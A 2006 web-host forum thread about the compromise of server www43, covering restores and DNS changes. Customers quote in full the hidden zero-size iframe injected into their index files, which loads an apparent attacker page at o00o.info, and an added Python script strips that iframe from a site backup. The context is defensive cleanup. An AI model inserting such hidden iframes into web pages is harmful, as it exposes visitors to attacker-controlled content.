www43



admin
08-19-2006, 09:24 PM
www43 has been compromised tonight. We're moving user backups to a new server and restoring, but it will likely be a couple of hours till everything is back to normal.

We'll update here as the evening progresses.

If you have a Joomla / Mambo site, it better be upgraded IMMEDIATELY - else it's liable to be suspended.

Joe

ryan
08-19-2006, 10:50 PM
Some sites have been defaced so as a security precaution HostPC is moving sites to a new server. We expect the down time to last a couple of hours.

A website on this server has been compromised. If you could, please change your nameservers to ns48a.hostpc.com and ns48b.hostpc.com, we will get your files restored as soon as we can.

SSH on all servers will be turned off for the time being.

Ryan

admin
08-20-2006, 12:43 AM
Status Report:

We've started the restores to a new server. We also identified where the attacker got access, and it has been blocked.

Restores are going alphabetically. DNS has been "hotwired" from the old server, to the new.

If you were on www43, please be sure your DNS is updated to:
ns48a.hostpc.com
ns48b.hostpc.com

As the sites are being restored, because we hotwired, they'll come back online, but you MUST update your DNS. This is done where you registered your domain name.


Updating DNS at enom.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_enom.html)
Updating DNS at GoDaddy.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_godaddy.html)
Updating DNS at registerfly.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_regfly.html)
Updating DNS at dotster.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_dotster.html)
Updating DNS at 123-reg.co.uk (http://www.hostpc.com/community/../onlinedemos/dns/dns_123reg.html)
Updating DNS at NameCheap.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_namecheap.html)
Updating DNS at NameBargain.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_namebargain.html)
Updating DNS at NetworkSolutions.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_netsol.html)
Updating DNS at Register.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_register.html)
Updating DNS at 000domains.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_000domains.html)
Updating DNS at ItsYourDomain.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_itsyourdomain.html)
Updating DNS at DomainSite.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_domainsite.html)
Updating DNS at DynaDot.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_dynadot.html)
Updating DNS at StarGate.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_stargate.html)
If you registered your domain at HostPC- the link is: http://www.hostpc.com/domains

Thank you

lnguyen
08-20-2006, 08:06 PM
Is there an email going out to all the users to change their DNS?

petern
08-20-2006, 11:05 PM
We expect the down time to last a couple of hours.

Could we have a status report on this?

Edit: Still seem to be getting database errors...

Thanks,

Peter

admin
08-20-2006, 11:52 PM
If you're still having issues with this, open a helpdesk ticket... we're in cleanup mode now fixing a couple of individual issues, but by and large, everything's done.

We'll be able to better help you through the helpdesk.

Thanks

petern
08-21-2006, 01:11 AM
OK, thanks, will do.

mharvey
08-23-2006, 12:54 PM
I was on www43 and I am now up and running on www48. I am not (and never have) run Joomla but I think my data files may have been affected.

I am seeing that every index.html file on my site has been modified to include a line:


<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>


I found a reference to this URL that has been inserted in all of my index.html files here:

http://forum.joomla.org/index.php?topic=86820.msg441212

I am thinking that when the Joomla install that someone had was exploited, it added this link to all the files on the server... including mine.

Does anyone have any more info on this? I am in the process of manually cleaning up my files.

starfighter
08-23-2006, 04:05 PM
I was on www43 and I am now up and running on www48. I am not (and never have) run Joomla but I think my data files may have been affected.

I am seeing that every index.html file on my site has been modified to include a line:


<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

I found a reference to this URL that has been inserted in all of my index.html files here:

http://forum.joomla.org/index.php?topic=86820.msg441212

I am thinking that when the Joomla install that someone had was exploited, it added this link to all the files on the server... including mine.

Does anyone have any more info on this? I am in the process of manually cleaning up my files.
Yes,
That line was added to everyone's index*.* files. It was a part of the hacker's hack of the server.


Dan

mharvey
08-23-2006, 04:05 PM
I am seeing that every file on my site named index.html and index.php has been modified to include this hidden IFRAME. Is there an easy way to do a global search and replace on these files? Tracking them down in the DirectAdmin file manager is a bit tedious.

I would also advise anyone that was on www43 to check their files. You may also find that all of your pages have been tagged by this attacker.

petern
08-23-2006, 08:55 PM
I am seeing that every file on my site named index.html and index.php has been modified to include this hidden IFRAME. Is there an easy way to do a global search and replace on these files? Tracking them down in the DirectAdmin file manager is a bit tedious.

I would also advise anyone that was on www43 to check their files. You may also find that all of your pages have been tagged by this attacker.

Same corruption on my site. Not sure how to track them all down without having shell access. Most of my sites were dynamic and as well as tagging the index.php files, most of my databases disappeared.

The best thing would have been if a restore could have been done from an uncorrupted backup - but I guess I'm asking too much. Once again, the lesson is to look after your own backups (and make sure you download them, all backups I had sitting on the server vanished).

mharvey
08-23-2006, 09:49 PM
I ended up doing a backup and downloading it. I then uncompressed the backup and did a global search and replace looking for the www.o00o.info URL. I then uploaded just the changed file using FTP.

I guess I am lucky that only my html was tagged.
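The sweep mharvey asked for a few posts up (a global search and replace over every index.html / index.php) and the workaround he describes here (download the backup, clean it offline, re-upload) can be scripted. The following is an added example, not code from the thread or from HostPC: it walks an unpacked backup, lists every file still carrying the o00o.info hostname quoted above, and strips only the injected hidden iframe (with the spurious `<html>...</html>` wrapper the attacker put around it), leaving any legitimate iframe alone. The sample site it builds is constructed here for demonstration; the `.infected` backup naming is this example's own convention.

```python
import os
import re
import shutil
import tempfile

# Hostname of the injected iframe, as quoted in the thread.
MARKER = "o00o.info"

# The fragment quoted in the thread; used here only to build the sample tree.
INJECTED_LINE = (
    "<html><iframe width=0 height=0 frameborder=0 "
    "src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 "
    "marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no>"
    "</iframe></html>"
)

# One injected fragment: a hidden <iframe ...></iframe> whose src points at
# MARKER, plus the bogus <html> ... </html> wrapper. Other iframes are untouched.
INJECTED_RE = re.compile(
    r"(?:<html>\s*)?<iframe\b[^>]*" + re.escape(MARKER) + r"[^>]*>\s*</iframe>(?:\s*</html>)?",
    re.IGNORECASE,
)

BACKUP_SUFFIX = ".infected"  # this example's own convention for kept originals


def find_tagged(root):
    """Sorted paths (relative to root) of files containing MARKER.

    Every regular file is checked, not only index.*, in case other pages were
    tagged too. Our own *.infected copies are skipped.
    """
    hits = []
    marker = MARKER.encode()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(BACKUP_SUFFIX):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                if marker in fh.read():
                    hits.append(os.path.relpath(path, root))
    return sorted(hits)


def strip_injected(text):
    """Remove every injected fragment; return (cleaned_text, removals)."""
    cleaned, n = INJECTED_RE.subn("", text)
    # The fragment was usually appended on a line of its own; collapse the
    # empty trailing lines that removing it leaves behind.
    cleaned = re.sub(r"[ \t]*\n[ \t]*\n+\Z", "\n", cleaned)
    return cleaned, n


def clean_tree(root, dry_run=True):
    """Strip the fragment from every tagged file under root; return {relpath: removals}.

    dry_run=True writes nothing, so the hit list can be reviewed first.
    dry_run=False keeps each original as <name>.infected before overwriting it.
    """
    results = {}
    for rel in find_tagged(root):
        path = os.path.join(root, rel)
        with open(path, "r", encoding="utf-8", errors="surrogateescape") as fh:
            original = fh.read()
        cleaned, n = strip_injected(original)
        results[rel] = n
        if n and not dry_run:
            shutil.copy2(path, path + BACKUP_SUFFIX)
            with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                fh.write(cleaned)
    return results


def read_rel(root, rel):
    """Read a file under root as text (for inspecting results)."""
    with open(os.path.join(root, rel), "r", encoding="utf-8", errors="surrogateescape") as fh:
        return fh.read()


def build_sample_tree():
    """Constructed sample backup: two tagged index files, one clean index file,
    one tagged non-index page. Returns the temporary root directory."""
    root = tempfile.mkdtemp(prefix="www43_")
    files = {
        "index.html": "<html><body><h1>Home</h1></body></html>\n" + INJECTED_LINE + "\n",
        # Fragment glued onto the last line instead of sitting on its own line.
        "blog/index.php": "<?php include 'header.php'; ?>\n<p>Blog</p>" + INJECTED_LINE + "\n",
        "about/index.htm": "<html><body>About</body></html>\n",
        "contact.html": "<p>Mail us</p>\n" + INJECTED_LINE + "\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    site = build_sample_tree()
    print("tagged:", find_tagged(site))
    print("dry run:", clean_tree(site))
    print("cleaned:", clean_tree(site, dry_run=False))
    print("still tagged:", find_tagged(site))
```

Run it once with the default dry run and read the hit list before letting it write; the match is deliberately tied to the attacker's hostname rather than to `<iframe` in general, because the same pattern will happily remove legitimate embeds if you loosen it. Anything the sweep does not catch (petern's missing databases, for instance) is not a file edit and needs a restore, not a search and replace.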

tonydi
08-23-2006, 11:28 PM
Thanks soooo much for finding this and bringing it to everyone's attention! Luckily it only affected one file for me and it was easy to clean up once you did all the legwork.

MoreFiles
08-24-2006, 08:41 AM
I thought all database installations were just removed as a precaution when we were moved? (note my data is all still there, and it wasn't presently under urgent need) ... I've occasionally had a survey running under PHPesp and if things had gone down during a time that was in use ... I'd have been very unhappy

I too had the o00o.info stuff in a few index files

Sean
08-26-2006, 02:21 PM
IMPORTANT:

We apologize, but the old AWStats history was lost when the old server (43) was compromised. We had planned on moving the stats over to the new server, but due to technical problems after moving all the accounts, we lost everything on that server beyond the daily backups of the user sites.
AWStats data was held in a common directory above the users' web account structure and thus was not included in the daily site backups. We now see the folly of this and are taking steps to move that data into each individual client's /log directory going forward. This should be completed in the coming weeks.

You will probably get an error message if you try to access the stats. Just log into your DA account and reinstall AWStats.

Webalizer stats should still be intact since they are held in each individual acct.